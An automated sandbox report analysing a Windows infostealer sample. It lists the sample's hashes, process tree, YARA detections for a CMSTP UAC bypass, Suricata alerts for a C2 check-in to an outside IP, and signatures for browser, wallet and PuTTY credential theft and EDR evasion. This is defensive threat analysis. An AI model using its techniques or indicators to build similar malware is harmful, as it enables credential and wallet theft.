Edit tour

Windows Analysis Report
BkTwXj17DH.exe

Overview

General Information

Sample name:	BkTwXj17DH.exe renamed because original name is a hash value
Original sample name:	baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6.exe
Analysis ID:	1556013
MD5:	b6ab13b3b9903bf84327737ba227bab3
SHA1:	65dff8665b502ba33f3effb8430263e4f906c1c0
SHA256:	baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6
Tags:	exesirnisirlo-onlineuser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

BkTwXj17DH.exe (PID: 7768 cmdline: "C:\Users\user\Desktop\BkTwXj17DH.exe" MD5: B6AB13B3B9903BF84327737BA227BAB3)

BkTwXj17DH.exe (PID: 7828 cmdline: "C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe" -burn.clean.room="C:\Users\user\Desktop\BkTwXj17DH.exe" -burn.filehandle.attached=516 -burn.filehandle.self=524 MD5: EB26DFA5E4E3170D90B5629DF0715AA9)

ActiveISO.exe (PID: 7880 cmdline: "C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe" MD5: B84DFABE933D1160F624693D94779CE5)

ActiveISO.exe (PID: 7904 cmdline: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe MD5: B84DFABE933D1160F624693D94779CE5)

cmd.exe (PID: 7936 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

UploadAlt_Ti.exe (PID: 7568 cmdline: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe MD5: 967F4470627F823F4D7981E511C9824F)

ActiveISO.exe (PID: 1152 cmdline: "C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe" MD5: B84DFABE933D1160F624693D94779CE5)

cmd.exe (PID: 1548 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ActiveISO.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe" MD5: B84DFABE933D1160F624693D94779CE5)

cmd.exe (PID: 6840 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

UploadAlt_Ti.exe (PID: 4032 cmdline: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe MD5: 967F4470627F823F4D7981E511C9824F)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.1807657601.00000275460F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.1859033846.0000000003670000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000017.00000002.2410296879.0000000002713000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.1859383110.0000000005684000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000002.1461341393.000001918E057000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000010.00000002.1936565276.000002259DA87000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000004.00000002.1528762272.000001B2559A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000013.00000002.2160143718.0000000004D12000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7936	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: UploadAlt_Ti.exe PID: 7568	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.UploadAlt_Ti.exe.26cc6ed.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.UploadAlt_Ti.exe.26cc6ed.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e692:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e71d:$s1: CoGetObject 0x25e676:$s2: Elevation:Administrator!new:
23.2.UploadAlt_Ti.exe.275f6ed.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.UploadAlt_Ti.exe.275f6ed.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e692:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e71d:$s1: CoGetObject 0x25e676:$s2: Elevation:Administrator!new:
5.2.cmd.exe.4d8cacd.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.cmd.exe.4d8cacd.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f292:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f31d:$s1: CoGetObject 0x25f276:$s2: Elevation:Administrator!new:
11.2.cmd.exe.56cfacd.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.cmd.exe.56cfacd.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f292:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f31d:$s1: CoGetObject 0x25f276:$s2: Elevation:Administrator!new:
19.2.cmd.exe.4d5e6cd.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
19.2.cmd.exe.4d5e6cd.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e692:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e71d:$s1: CoGetObject 0x25e676:$s2: Elevation:Administrator!new:
19.2.cmd.exe.4d5dacd.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
19.2.cmd.exe.4d5dacd.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f292:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f31d:$s1: CoGetObject 0x25f276:$s2: Elevation:Administrator!new:
23.2.UploadAlt_Ti.exe.2719a20.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.UploadAlt_Ti.exe.2719a20.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a435f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43ea:$s1: CoGetObject 0x2a4343:$s2: Elevation:Administrator!new:
19.2.cmd.exe.4d18a00.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
19.2.cmd.exe.4d18a00.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a435f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43ea:$s1: CoGetObject 0x2a4343:$s2: Elevation:Administrator!new:
11.2.cmd.exe.36707f8.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.cmd.exe.36707f8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x10f28:$s2: Elevation:Administrator!new:
23.2.UploadAlt_Ti.exe.275eaed.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.UploadAlt_Ti.exe.275eaed.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f292:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f31d:$s1: CoGetObject 0x25f276:$s2: Elevation:Administrator!new:
9.2.UploadAlt_Ti.exe.26cbaed.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.UploadAlt_Ti.exe.26cbaed.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f292:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f31d:$s1: CoGetObject 0x25f276:$s2: Elevation:Administrator!new:
9.2.UploadAlt_Ti.exe.2686a20.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.UploadAlt_Ti.exe.2686a20.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a435f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43ea:$s1: CoGetObject 0x2a4343:$s2: Elevation:Administrator!new:
5.2.cmd.exe.4d8d6cd.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.cmd.exe.4d8d6cd.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e692:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e71d:$s1: CoGetObject 0x25e676:$s2: Elevation:Administrator!new:
5.2.cmd.exe.4d47a00.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.cmd.exe.4d47a00.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a435f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43ea:$s1: CoGetObject 0x2a4343:$s2: Elevation:Administrator!new:
11.2.cmd.exe.568aa00.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.cmd.exe.568aa00.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a435f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43ea:$s1: CoGetObject 0x2a4343:$s2: Elevation:Administrator!new:
11.2.cmd.exe.56d06cd.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.cmd.exe.56d06cd.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e692:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e71d:$s1: CoGetObject 0x25e676:$s2: Elevation:Administrator!new:
Click to see the 27 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T19:57:45.902270+0100	2028371	3	Unknown Traffic	192.168.2.8	58009	188.114.96.3	443	TCP
2024-11-14T19:57:48.217330+0100	2028371	3	Unknown Traffic	192.168.2.8	58010	188.114.96.3	443	TCP
2024-11-14T19:57:49.423652+0100	2028371	3	Unknown Traffic	192.168.2.8	58011	188.114.96.3	443	TCP
2024-11-14T19:57:53.226778+0100	2028371	3	Unknown Traffic	192.168.2.8	58013	188.114.96.3	443	TCP
2024-11-14T19:57:55.114167+0100	2028371	3	Unknown Traffic	192.168.2.8	58014	188.114.96.3	443	TCP
2024-11-14T19:57:56.355855+0100	2028371	3	Unknown Traffic	192.168.2.8	58015	188.114.96.3	443	TCP
2024-11-14T19:57:57.906772+0100	2028371	3	Unknown Traffic	192.168.2.8	58016	188.114.96.3	443	TCP
2024-11-14T19:57:59.410320+0100	2028371	3	Unknown Traffic	192.168.2.8	58017	188.114.96.3	443	TCP
2024-11-14T19:58:01.125630+0100	2028371	3	Unknown Traffic	192.168.2.8	58018	188.114.96.3	443	TCP
2024-11-14T19:58:02.706963+0100	2028371	3	Unknown Traffic	192.168.2.8	58019	188.114.96.3	443	TCP
2024-11-14T19:58:28.466185+0100	2028371	3	Unknown Traffic	192.168.2.8	58020	188.114.96.3	443	TCP
2024-11-14T19:58:30.627206+0100	2028371	3	Unknown Traffic	192.168.2.8	58021	188.114.96.3	443	TCP
2024-11-14T19:58:31.965751+0100	2028371	3	Unknown Traffic	192.168.2.8	58022	188.114.96.3	443	TCP
2024-11-14T19:58:34.454171+0100	2028371	3	Unknown Traffic	192.168.2.8	58023	188.114.96.3	443	TCP
2024-11-14T19:58:36.337590+0100	2028371	3	Unknown Traffic	192.168.2.8	58024	188.114.96.3	443	TCP
2024-11-14T19:58:37.607860+0100	2028371	3	Unknown Traffic	192.168.2.8	58025	188.114.96.3	443	TCP
2024-11-14T19:58:38.797928+0100	2028371	3	Unknown Traffic	192.168.2.8	58026	188.114.96.3	443	TCP
2024-11-14T19:58:39.870099+0100	2028371	3	Unknown Traffic	192.168.2.8	58027	188.114.96.3	443	TCP
2024-11-14T19:58:41.516373+0100	2028371	3	Unknown Traffic	192.168.2.8	58028	188.114.96.3	443	TCP
2024-11-14T19:58:43.224849+0100	2028371	3	Unknown Traffic	192.168.2.8	58029	188.114.96.3	443	TCP

ET MALWARE Win32/DeerStealer CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T19:58:29.346638+0100	2056550	1	A Network Trojan was detected	192.168.2.8	58020	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\xsnxlhd	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dykhaneiil	Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004DA0BB DecryptFileW,	0_2_004DA0BB
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004FFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	0_2_004FFA62
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004D9E9E DecryptFileW,DecryptFileW,	0_2_004D9E9E
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D6A0BB DecryptFileW,	2_2_00D6A0BB
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D8FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	2_2_00D8FA62
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D69E9E DecryptFileW,DecryptFileW,	2_2_00D69E9E
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A956FA0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	3_2_00007FF72A956FA0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4166FA0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	4_2_00007FF7F4166FA0

Source: ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_536e1cef-8

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 9.2.UploadAlt_Ti.exe.26cc6ed.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.UploadAlt_Ti.exe.275f6ed.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.4d8cacd.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cmd.exe.56cfacd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.cmd.exe.4d5e6cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.cmd.exe.4d5dacd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.UploadAlt_Ti.exe.2719a20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.cmd.exe.4d18a00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cmd.exe.36707f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.UploadAlt_Ti.exe.275eaed.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.UploadAlt_Ti.exe.26cbaed.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.UploadAlt_Ti.exe.2686a20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.4d8d6cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.4d47a00.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cmd.exe.568aa00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cmd.exe.56d06cd.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1807657601.00000275460F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1859033846.0000000003670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2410296879.0000000002713000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1859383110.0000000005684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1461341393.000001918E057000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1936565276.000002259DA87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1528762272.000001B2559A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2160143718.0000000004D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UploadAlt_Ti.exe PID: 7568, type: MEMORYSTR

Source: BkTwXj17DH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58023 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58029 version: TLS 1.2

Source: BkTwXj17DH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: BkTwXj17DH.exe, 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmp, BkTwXj17DH.exe, 00000000.00000000.1415495894.000000000050B000.00000002.00000001.01000000.00000003.sdmp, BkTwXj17DH.exe, 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmp, BkTwXj17DH.exe, 00000002.00000000.1420259549.0000000000D9B000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\sharefolders.pdb' source: BkTwXj17DH.exe, 00000002.00000002.1473759971.000000007000A000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5PrintSupport.pdb33 source: ActiveISO.exe, 00000003.00000002.1468035111.00007FFBAB070000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1534561084.00007FFBAA2A0000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: ActiveISO.exe, 00000003.00000002.1463442325.00007FFBA9C7C000.00000002.00000001.01000000.0000000C.sdmp, ActiveISO.exe, 00000004.00000002.1531943131.00007FFBA869C000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: ActiveISO.exe, 00000003.00000002.1469772172.00007FFBC3135000.00000002.00000001.01000000.0000000F.sdmp, ActiveISO.exe, 00000003.00000002.1456960505.000001918B2DA000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1535027214.00007FFBBC9F5000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: ntdll.pdb source: ActiveISO.exe, 00000003.00000002.1462470445.000001918E740000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000002.1462216320.000001918E345000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1530200810.000001B256293000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1529317938.000001B255C97000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1529694254.000001B256090000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2009396599.00000000043B5000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008251395.00000000039B1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2012194200.00000000055B6000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008941462.0000000003FB2000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2010789316.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2007277559.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2009614238.00000000045B0000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 